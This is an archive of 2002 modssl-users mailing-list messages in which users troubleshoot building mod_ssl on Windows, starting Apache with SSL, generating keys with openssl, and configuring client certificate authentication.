Received: from caligula.unitec.edu.ve (SOPORTE [200.35.82.242]) by krusty.unitec.edu.ve with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)
	id LR8KY2C5; Tue, 11 Jun 2002 12:49:26 -0400
Message-Id: <5.1.0.14.0.20020611124908.00b1e798@mail.unitec.edu.ve>
X-Sender: vmedina98@mail.unitec.edu.ve
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 11 Jun 2002 12:52:09 -0400
To: modssl-users@modssl.org
From: Victor Medina 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
In-Reply-To: <026f01c21105$a95a6ee0$6401a8c0@bohr>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA15777
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victor Medina 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Most probably you haven´t add path to the ssl dll´s or lib inside VS, go to 
tools\configure\directories and add the path to the include and bin folders 
of your OpenSSL installation this should work just fine

Best Regards

Victor Medina
Universidad Tecnologica del Centro
Valencia-Venezuela
(http://www.unitec.edu.ve)



At 12:05 AM 6/11/2002 -0500, you wrote:

>I've successfully compiled Apacche 2.0.36 and openssl as this thread 
>describes.  I'm encountering problems building modssl though.  When I try 
>to use NMAKE /f "mod_ssl.mak" CFG="mod_ssl - Win32 Release", i get the 
>following:
>         link.exe @C:\DOCUME~1\ADMINI~1.000\LOCALS~1\Temp\nma02752.
>    Creating library .\Release\libapr.lib and object .\Release\libapr.exp
>         cd "..\..\modules\ssl"
>         tempfile.bat
>The system cannot find the file specified.
>Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.c
>The system cannot find the file specified.
>Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.h
>NMAKE : fatal error U1077: 'tempfile.bat' : return code '0x1'
>Stop.
>I didn't find these files anywhere in the apache or openssl directories.
>
>When I used VC++, I get:
>Linking...
>    Creating library Debug/mod_ssl.lib and object Debug/mod_ssl.exp
>ssl_expr_scan.obj : error LNK2001: unresolved external symbol _ap_pstrdup
>Debug/mod_ssl.so : fatal error LNK1120: 1 unresolved externals
>Error executing link.exe.
>mod_ssl.so - 2 error(s), 0 warning(s)
>I'm sure its something obvious that I've overlooked.  Does anyone have any 
>suggestions?
>
>Thanks; Phil
>
>Thanks everyone, we now have everything working fine.
>
>A quick howto for beginners (who perhaps experience what we have
>experienced):
>
>If you want win2k + mod-ssl, don't trust the apache HOWTO at
>http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
>be fine for those who don't need ssl (and those people can simply use
>the supplied binaries) but they are wrong if you need ssl.
>
>Firstly, don't use the perl examples given on apache.org to prepare and
>compile openssl, use the instructions in INSTALL.W32 that comes with the
>openSSL source.
>
>We eventually found that with visual C++ 6 we could compile apache
>without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
>moved the mod-ssl.so binary to the modules folder in the apache
>installation.
>
>And that's it, except you need to know how to start Apache in "ssl
>mode".
>
>from the console in the apache\bin use
>
> >apache -D SSL
>
>to install apache to run as a service with SSL
>
> >apache -i -D SSL
>
>Hope this helps someone out there, and thanks to everyone who helped us!
>
>John.
>
>
>
>
>
>----- Original Message -----
>From: "Mark Chew" 
>To: 
>Sent: Monday, June 10, 2002 7:11 PM
>Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>
>
>: Assuming the win2k service for Apache is created
>: (else create one using sc command),
>: try configure the Apache service properties like this :
>:
>: Path to executable:
>: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
>:
>: Startup type:
>: Automatic
>:
>:
>:
>: Regards,
>: Mark
>:
>:
>: >From: "John" 
>: >Reply-To: modssl-users@modssl.org
>: >To: 
>: >Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
>: >Date: Mon, 10 Jun 2002 17:20:20 +1200
>: >
>: >We have discovered that if we start Apache from the console with
>: > >apache -D SSL on our windows server, then we have ssl support...
>: >Please, someone, how do we get ssl support running as a service?
>: >
>: >It seems we have wasted a couple of days, simply to find this out!
>: >
>: >John.
>: >
>: >
>: >
>: >
>:
> >______________________________________________________________________
>: >Apache Interface to OpenSSL (mod_ssl)
>www.modssl.org
>: >User Support Mailing List
>modssl-users@modssl.org
>: >Automated List Manager
>majordomo@modssl.org
>:
>:
>:
>:
>: _________________________________________________________________
>: Chat with friends online, try MSN Messenger: http://messenger.msn.com
>:
>: ______________________________________________________________________
>: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>: User Support Mailing List                      modssl-users@modssl.org
>: Automated List Manager                            majordomo@modssl.org
>:
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List 
>Manager 
>majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 19:23:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18232; Tue, 11 Jun 2002 19:22:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id TAA18179; Tue, 11 Jun 2002 19:21:17 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 11 Jun 2002 10:21:42 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 11 Jun 2002 10:21:09 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 11 Jun 2002 10:21:02 -0700
From: "Jeff Landers" 
To: 
Subject: Re: apache2 won't start
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA18228
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thank you for the info. I will work on debugging but here is another question. Why, when ssl and apache are under /usr/local,  is vhosts.c still under the source code directory? This seems more like a compilation problem although I have compiled it a couple of times. 

>>> jwoolley@apache.org 06/10/02 09:56AM >>>
On Mon, 10 Jun 2002, Jeff Landers wrote:

>  ./bin/apachectl startssl [Mon Jun 10 10:19:51 2002] [crit] [Mon Jun 10
> 10:19:51 2002] file vhost.c, line 232, assertion "rv == APR_SUCCESS"
> failed Abort - core dumped ./bin/apachectl startssl: httpd could not be
> started


That means the call to apr_sockaddr_info_get() on the address
"255.255.255.255" failed (the call is made because you're using
"_default_" in one of your vhosts).  So then the question is: why did it
fail?  Well, to know that, I need to know (a) what the actual return code
was, (b) what OS you're running, and it would be helpful to also have (c)
a backtrace.

See http://httpd.apache.org/dev/debugging.html for help on fetching b and
c.  :)

Thanks,
Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 19:29:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18493; Tue, 11 Jun 2002 19:28:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA18488; Tue, 11 Jun 2002 19:27:48 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5BHNgE01531
	for ; Tue, 11 Jun 2002 13:23:42 -0400
Date: Tue, 11 Jun 2002 13:23:42 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: apache2 won't start
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 11 Jun 2002, Jeff Landers wrote:

> Thank you for the info. I will work on debugging but here is another
> question. Why, when ssl and apache are under /usr/local, is vhosts.c
> still under the source code directory? This seems more like a
> compilation problem although I have compiled it a couple of times.

Um, because vhosts.c is one of the source files?  I guess I don't
understand the question.  It's not a compilation problem -- it compiles
just fine.  It's a runtime problem.  It just so happens that the runtime
error occurred in code that was compiled from vhosts.c, and the debugger
is telling you which source file to look in for the line that faulted.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 20:00:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20119; Tue, 11 Jun 2002 19:59:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id TAA20088; Tue, 11 Jun 2002 19:58:08 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 11 Jun 2002 10:58:34 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 11 Jun 2002 10:58:01 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 11 Jun 2002 10:57:53 -0700
From: "Jeff Landers" 
To: 
Subject: Re: apache2 won't start
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA20113
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The question is, and maybe I am just totally in left field, if I compile it and install in /usr/local/apache shouldn't all of the necessary code be located there instead of in the original tarball directory located under /tmp which I am going to blow away once the thing works.  I didn't see the non-ssl version going back to the source directory after it was compiled because I blew the souce directory (tarball extraction) away. Can you get this newbie on the right track. The non-ssl version works but once I compile it with the ssl module it won't work either way.

Jeff Landers
UNIX System Administrator
City of Henderson, NV
702-566-2761
jl1@gty.ci.henderson.nv.us

>>> jwoolley@apache.org 06/11/02 10:23AM >>>
On Tue, 11 Jun 2002, Jeff Landers wrote:

> Thank you for the info. I will work on debugging but here is another
> question. Why, when ssl and apache are under /usr/local, is vhosts.c
> still under the source code directory? This seems more like a
> compilation problem although I have compiled it a couple of times.

Um, because vhosts.c is one of the source files?  I guess I don't
understand the question.  It's not a compilation problem -- it compiles
just fine.  It's a runtime problem.  It just so happens that the runtime
error occurred in code that was compiled from vhosts.c, and the debugger
is telling you which source file to look in for the line that faulted.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 11 20:14:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA21414; Tue, 11 Jun 2002 20:13:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lclweb.lclcan.com id UAA21395; Tue, 11 Jun 2002 20:12:15 +0200 (MET DST)
Received: (from uucp@localhost)
	by lclweb.lclcan.com (8.9.3/8.9.3) id OAA07832
	for ; Tue, 11 Jun 2002 14:26:55 -0400
Received: from olympus.lclcan.com(205.205.137.131) by lclweb.lclcan.com via smap (V2.1)
	id sma007777; Tue, 11 Jun 02 14:26:45 -0400
Received: from doctor (doctor.lclcan.com [205.205.137.151]) by olympus.lclcan.com (8.8.8/SCO5) with SMTP id OAA23785 for ; Tue, 11 Jun 2002 14:10:50 -0400 (EDT)
Message-ID: <01c901c21173$94c75d80$c889cdcd@lclcan.com>
From: "Don" 
To: "modssl" 
Subject: Creating a certificate under Apache & ModSSL
Date: Tue, 11 Jun 2002 14:12:38 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01C6_01C21152.0AA0DC60"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01C6_01C21152.0AA0DC60
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

I hope this is not off topic.

Using RedHat Linux 6.2
Apache 1.3.24 with Mod_SSL
OpenSSL 0.0.6d

Everything is installed and seems to be working.  I am now trying to =
create my "private key".  The documentation from Thawte states the =
following command:

openssl genrsa -rand /dev/urandom -out www.mudomain.com.key 1024

When I try the above, it creates a 0 byte file and just hangs until =
break.  Any idea how to go about creating my private key?

Thanks,
Don
------=_NextPart_000_01C6_01C21152.0AA0DC60
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


 


I hope this is not off =
topic.


 


Using RedHat Linux 6.2


Apache 1.3.24 with Mod_SSL


OpenSSL 0.0.6d


 


Everything is installed and seems to be =

working.  I am now trying to create my "private key".  The=20
documentation from Thawte states the following command:


 


openssl genrsa -rand /dev/urandom -out =
www.mudomain.com.key =
1024


 


When I try the above, it creates a 0 =
byte file and=20
just hangs until break.  Any idea how to go about creating my =
private=20
key?


 


Thanks,


Don


------=_NextPart_000_01C6_01C21152.0AA0DC60--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 02:48:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA12393; Wed, 12 Jun 2002 02:47:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rwcrmhc51.attbi.com id CAA12372; Wed, 12 Jun 2002 02:46:43 +0200 (MET DST)
Received: from bohr ([12.241.5.8]) by rwcrmhc51.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020612004637.OGTX11426.rwcrmhc51.attbi.com@bohr>
          for ; Wed, 12 Jun 2002 00:46:37 +0000
Message-ID: <033c01c211ab$b97a1220$6401a8c0@bohr>
From: "Phil Smiley" 
To: 
References: <5.1.0.14.0.20020611124908.00b1e798@mail.unitec.edu.ve>
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Tue, 11 Jun 2002 19:54:35 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Phil Smiley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've included the following libs with the results I soecified below.

kernel32.lib user32.lib wsock32.lib ws2_32.lib advapi32.lib gdi32.lib
ssleay32.lib libeay32.lib libapr.lib libaprutil.lib libhttpd.lib

I also included the directories with the openssl libraries.  Same result.

Thanks; Phil

----- Original Message -----
From: "Victor Medina" 
To: 
Sent: Tuesday, June 11, 2002 11:52 AM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


> Most probably you haven´t add path to the ssl dll´s or lib inside VS, go
to
> tools\configure\directories and add the path to the include and bin
folders
> of your OpenSSL installation this should work just fine
>
> Best Regards
>
> Victor Medina
> Universidad Tecnologica del Centro
> Valencia-Venezuela
> (http://www.unitec.edu.ve)
>
>
>
> At 12:05 AM 6/11/2002 -0500, you wrote:
>
> >I've successfully compiled Apacche 2.0.36 and openssl as this thread
> >describes.  I'm encountering problems building modssl though.  When I try
> >to use NMAKE /f "mod_ssl.mak" CFG="mod_ssl - Win32 Release", i get the
> >following:
> >         link.exe @C:\DOCUME~1\ADMINI~1.000\LOCALS~1\Temp\nma02752.
> >    Creating library .\Release\libapr.lib and object .\Release\libapr.exp
> >         cd "..\..\modules\ssl"
> >         tempfile.bat
> >The system cannot find the file specified.
> >Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.c
> >The system cannot find the file specified.
> >Could Not Find C:\httpd-2.0.36\modules\ssl\y.tab.h
> >NMAKE : fatal error U1077: 'tempfile.bat' : return code '0x1'
> >Stop.
> >I didn't find these files anywhere in the apache or openssl directories.
> >
> >When I used VC++, I get:
> >Linking...
> >    Creating library Debug/mod_ssl.lib and object Debug/mod_ssl.exp
> >ssl_expr_scan.obj : error LNK2001: unresolved external symbol _ap_pstrdup
> >Debug/mod_ssl.so : fatal error LNK1120: 1 unresolved externals
> >Error executing link.exe.
> >mod_ssl.so - 2 error(s), 0 warning(s)
> >I'm sure its something obvious that I've overlooked.  Does anyone have
any
> >suggestions?
> >
> >Thanks; Phil
> >
> >Thanks everyone, we now have everything working fine.
> >
> >A quick howto for beginners (who perhaps experience what we have
> >experienced):
> >
> >If you want win2k + mod-ssl, don't trust the apache HOWTO at
> >http://httpd.apache.org/docs-2.0/platform/win_compiling.html, they may
> >be fine for those who don't need ssl (and those people can simply use
> >the supplied binaries) but they are wrong if you need ssl.
> >
> >Firstly, don't use the perl examples given on apache.org to prepare and
> >compile openssl, use the instructions in INSTALL.W32 that comes with the
> >openSSL source.
> >
> >We eventually found that with visual C++ 6 we could compile apache
> >without ssl fine. Later we compiled mod-ssl alone (also in VC++) and
> >moved the mod-ssl.so binary to the modules folder in the apache
> >installation.
> >
> >And that's it, except you need to know how to start Apache in "ssl
> >mode".
> >
> >from the console in the apache\bin use
> >
> > >apache -D SSL
> >
> >to install apache to run as a service with SSL
> >
> > >apache -i -D SSL
> >
> >Hope this helps someone out there, and thanks to everyone who helped us!
> >
> >John.
> >
> >
> >
> >
> >
> >----- Original Message -----
> >From: "Mark Chew" 
> >To: 
> >Sent: Monday, June 10, 2002 7:11 PM
> >Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
> >
> >
> >: Assuming the win2k service for Apache is created
> >: (else create one using sc command),
> >: try configure the Apache service properties like this :
> >:
> >: Path to executable:
> >: "C:\Program Files\Apache Group\Apache\Apache.exe" --ntservice
> >:
> >: Startup type:
> >: Automatic
> >:
> >:
> >:
> >: Regards,
> >: Mark
> >:
> >:
> >: >From: "John" 
> >: >Reply-To: modssl-users@modssl.org
> >: >To: 
> >: >Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
> >: >Date: Mon, 10 Jun 2002 17:20:20 +1200
> >: >
> >: >We have discovered that if we start Apache from the console with
> >: > >apache -D SSL on our windows server, then we have ssl support...
> >: >Please, someone, how do we get ssl support running as a service?
> >: >
> >: >It seems we have wasted a couple of days, simply to find this out!
> >: >
> >: >John.
> >: >
> >: >
> >: >
> >: >
> >:
> > >______________________________________________________________________
> >: >Apache Interface to OpenSSL (mod_ssl)
> >www.modssl.org
> >: >User Support Mailing List
> >modssl-users@modssl.org
> >: >Automated List Manager
> >majordomo@modssl.org
> >:
> >:
> >:
> >:
> >: _________________________________________________________________
> >: Chat with friends online, try MSN Messenger: http://messenger.msn.com
> >:
> >: ______________________________________________________________________
> >: Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >: User Support Mailing List                      modssl-users@modssl.org
> >: Automated List Manager                            majordomo@modssl.org
> >:
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List
> >Manager
> >majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 09:22:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA02571; Wed, 12 Jun 2002 09:21:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from amrum.isl.org id JAA02547; Wed, 12 Jun 2002 09:20:57 +0200 (MET DST)
Received: from hofmann_nt (babykrake.isl.uni-bremen.de [134.102.136.208])
	by amrum.isl.org (8.9.3/8.9.3) with ESMTP id JAA22336
	for ; Wed, 12 Jun 2002 09:20:51 +0200
From: "Kai Hofmann" 
Organization: ISL - Bremen
To: modssl-users@modssl.org
Date: Wed, 12 Jun 2002 09:20:52 +0200
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: 8BIT
Comments: Sender has elected to use 8-bit data in this message.
  If problems arise, refer to postmaster at sender's site.
Subject: User Certificate Authentication with Apache 1.3.23
Message-ID: <3D071273.2772.4307152@localhost>
X-mailer: Pegasus Mail for Win32 (v3.12cDE)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kai Hofmann" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am using:

Apache 1.3.23,
mod_ssl 2.8.7,
openssl 0.9.6c
(Also perl and php)

I tried to activate user authentication via personal certifacates from Thawte,
exactly like described in the HowTo under:

How can I authenticate only particular clients for a some
URLs based on certificates but still allow arbitrary clients
to access the remaining parts of the server? 

(first method!!!)



This works with an experimental Apache 2.0.36 server except of the know
http/https hang ups.

The problem now is that with the Apache 1.3.23 I can not make it work
correctly - the user certificate is accepted correctly without a message
in the error log file (when I cange the httpd.passwd a bit I got errors that
the user or the passwd is not found!).
So I assume the basics are ok, but I got always an 403 error as result.

Using a log devel of trace or debug don't let me see the problem.
The only thing that wonders me a bit ist:

Connection to child X closed with standard shutdown ....

Anyone who can help me to find and solve the problem?

I am using only one virtual name based host for ssl!

Thanks


   Kai Hofmann



-- 
Institut für Seeverkehrswirtschaft und Logistik   http://www.isl.org/
Dipl.-Inform. Kai Hofmann                       mailto:hofmann@isl.org
Universitaetsallee GW1 Block A                   phone:+49 421 22096-83
D-28359 Bremen                                     fax:+49 421 22096-55
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 09:28:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA02818; Wed, 12 Jun 2002 09:27:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from kaikoura.fel.tno.nl id JAA02805; Wed, 12 Jun 2002 09:26:55 +0200 (MET DST)
Received: by kaikoura.fel.tno.nl; id JAA14550; Wed, 12 Jun 2002 09:26:46 +0200 (MET DST)
Received: from fs1.fel.tno.nl(134.203.8.201) by kaikoura.fel.tno.nl via smap (V1.0)
	id xma014248; Wed, 12 Jun 02 09:26:22 +0200
Received: from pc1928.fel.tno.nl ([134.203.9.113]) by
          fs1.fel.tno.nl (Netscape Messaging Server 4.15) with SMTP id
          GXL0NR00.34F for ; Wed, 12 Jun 2002
          09:26:15 +0200 
Received: FROM fel.tno.nl BY pc1928.fel.tno.nl ; Wed Jun 12 09:26:13 2002 +0200
Message-ID: <3D06F794.91F20D36@fel.tno.nl>
Date: Wed, 12 Jun 2002 09:26:12 +0200
From: "DG Speekenbrink" 
Organization: TNO-FEL
X-Mailer: Mozilla 4.75 [en]C-Netscape2000  (Win95; U)
X-Accept-Language: en,nl,fr,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: User Certificate Authentication with Apache 1.3.23
References: <3D071273.2772.4307152@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "DG Speekenbrink" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I tried to activate user authentication via personal certifacates from Thawte,
> exactly like described in the HowTo under:
> 

Could you give me a pointer to this howto your speaking of?
I'm just starting to work with certificates and was just about to look
for such a document.

TIA,

Dennis Speekenbrink
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 10:17:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA05143; Wed, 12 Jun 2002 10:16:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from amrum.isl.org id KAA05103; Wed, 12 Jun 2002 10:15:10 +0200 (MET DST)
Received: from hofmann_nt (babykrake.isl.uni-bremen.de [134.102.136.208])
	by amrum.isl.org (8.9.3/8.9.3) with ESMTP id KAA24730
	for ; Wed, 12 Jun 2002 10:15:05 +0200
From: "Kai Hofmann" 
Organization: ISL - Bremen
To: modssl-users@modssl.org
Date: Wed, 12 Jun 2002 10:15:04 +0200
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: 8BIT
Comments: Sender has elected to use 8-bit data in this message.
  If problems arise, refer to postmaster at sender's site.
Subject: Re: User Certificate Authentication with Apache 1.3.23
Message-ID: <3D071F27.13397.461364E@localhost>
In-reply-to: <3D06F794.91F20D36@fel.tno.nl>
X-mailer: Pegasus Mail for Win32 (v3.12cDE)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kai Hofmann" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Could you give me a pointer to this howto your speaking of?
> I'm just starting to work with certificates and was just about to look
> for such a document.

http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6

For thawte (free!) certificates take a look at:

http://www.thawte.com/getinfo/products/personal/contents.html

-- 
Institut für Seeverkehrswirtschaft und Logistik   http://www.isl.org/
Dipl.-Inform. Kai Hofmann                       mailto:hofmann@isl.org
Universitaetsallee GW1 Block A                   phone:+49 421 22096-83
D-28359 Bremen                                     fax:+49 421 22096-55
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 10:30:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA05943; Wed, 12 Jun 2002 10:29:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA05872; Wed, 12 Jun 2002 10:28:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5774B4CE785; Wed, 12 Jun 2002 10:28:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E52E42897B; Wed, 12 Jun 2002 10:04:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from po1.bbn.com id VAA25187; Tue, 11 Jun 2002 21:30:48 +0200 (MET DST)
Received: from skarumurD1.bbn.com (dhcp33-085-042.bbn.com [128.33.85.42])
	by po1.bbn.com (8.9.1/8.9.1) with ESMTP id PAA01990
	for ; Tue, 11 Jun 2002 15:30:18 -0400 (EDT)
Message-Id: <5.1.0.14.2.20020611152931.025eeb98@po2.bbn.com>
X-Sender: skarumur@po2.bbn.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 11 Jun 2002 15:30:36 -0400
To: modssl-users@modssl.org
From: Srinadh Karumuri 
Subject: Can we reuse certificate for other sites.
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Srinadh Karumuri 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

If we generate a site certificate for name1.com can we use this certificate 
for name2.name1.com?

Thanks,
Sri
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

